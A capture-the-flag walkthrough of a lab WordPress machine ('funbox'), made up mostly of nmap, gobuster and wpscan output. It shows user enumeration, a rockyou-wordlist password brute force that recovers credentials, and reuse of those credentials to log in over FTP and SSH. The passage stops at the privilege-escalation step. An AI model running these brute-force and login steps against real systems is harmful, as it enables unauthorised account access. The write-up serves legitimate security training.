PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to <http://funbox.fritz.box/>
| http-robots.txt: 1 disallowed entry
|_/secret/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data.
When we browse to the IP we are redirected to http://funbox.fritz.box/ so hi /etc/hosts
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://funbox.fritz.box/> -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.hta (Status: 403) [Size: 281]
/.htpasswd (Status: 403) [Size: 281]
/.htaccess (Status: 403) [Size: 281]
/index.php (Status: 301) [Size: 0] [--> <http://funbox.fritz.box/>]
/robots.txt (Status: 200) [Size: 19]
/secret (Status: 301) [Size: 321] [--> <http://funbox.fritz.box/secret/>]
/server-status (Status: 403) [Size: 281]
/wp-admin (Status: 301) [Size: 323] [--> <http://funbox.fritz.box/wp-admin/>]
/wp-includes (Status: 301) [Size: 326] [--> <http://funbox.fritz.box/wp-includes/>]
/wp-content (Status: 301) [Size: 325] [--> <http://funbox.fritz.box/wp-content/>]
/xmlrpc.php (Status: 405) [Size: 42]
The /secret/ is a troll, and this seems like another WordPress site
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://funbox.fritz.box/> --enumerate u
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://funbox.fritz.box/> [192.168.158.77]
[+] Started: Mon Jul 18 04:31:22 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: <http://funbox.fritz.box/robots.txt>
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://funbox.fritz.box/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://funbox.fritz.box/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://funbox.fritz.box/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://funbox.fritz.box/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - <http://funbox.fritz.box/index.php/feed/>, <generator><https://wordpress.org/?v=5.4.2></generator>
| - <http://funbox.fritz.box/index.php/comments/feed/>, <generator><https://wordpress.org/?v=5.4.2></generator>
[+] WordPress theme in use: twentyseventeen
| Location: <http://funbox.fritz.box/wp-content/themes/twentyseventeen/>
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: <http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt>
| [!] The version is out of date, the latest version is 3.0
| Style URL: <http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507>
| Style Name: Twenty Seventeen
| Style URI: <https://wordpress.org/themes/twentyseventeen/>
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507>, Match: 'Version: 2.3'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <========> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - <http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1>
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] joe
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
There is no interesting plugin, but we found user joe and admin
First we bruteforce joe credentials using wpscan
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://funbox.fritz.box/> -U joe -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: joe, Password: 12345
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://funbox.fritz.box/> -U admin -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: admin, Password: iubire
Then after we got the credentials, go to FTP and test with joe
┌──(kali㉿VirtualBox)-[~]
└─$ ftp 192.168.158.77
Connected to 192.168.158.77.
220 ProFTPD Server (Debian) [192.168.158.77]
Name (192.168.158.77:kali): joe
331 Password required for joe
Password: 12345
230 User joe logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||50059|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 5 joe joe 4096 Aug 21 2020 .
drwxr-xr-x 4 root root 4096 Jun 19 2020 ..
lrwxrwxrwx 1 joe joe 9 Aug 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 joe joe 220 Jun 19 2020 .bash_logout
-rw-r--r-- 1 joe joe 3771 Jun 19 2020 .bashrc
drwx------ 2 joe joe 4096 Jun 19 2020 .cache
drwxrwxr-x 3 joe joe 4096 Jul 18 2020 .local
-rw-r--r-- 1 root root 33 Jul 18 08:24 local.txt
-rw------- 1 joe joe 998 Jul 18 2020 mbox
-rw-r--r-- 1 joe joe 807 Jun 19 2020 .profile
drwx------ 2 joe joe 4096 Jun 22 2020 .ssh
226 Transfer complete
Easiest from here we get the local.txt but we don’t have the shell yet
ftp> get local.txt
┌──(kali㉿VirtualBox)-[~]
└─$ cat local.txt
2f9436b9fcce0c838e68df9de8296466
How about trying the same credentials for the SSH login?
┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected]
[email protected]'s password: 12345
joe@funbox:~$ whoami
joe
joe@funbox:~$ cat local.txt
2f9436b9fcce0c838e68df9de8296466
So I wasted about 30 minutes here trying to transfer SSH key onto FTP but not working
We can’t do sudo -l so we try to find SUID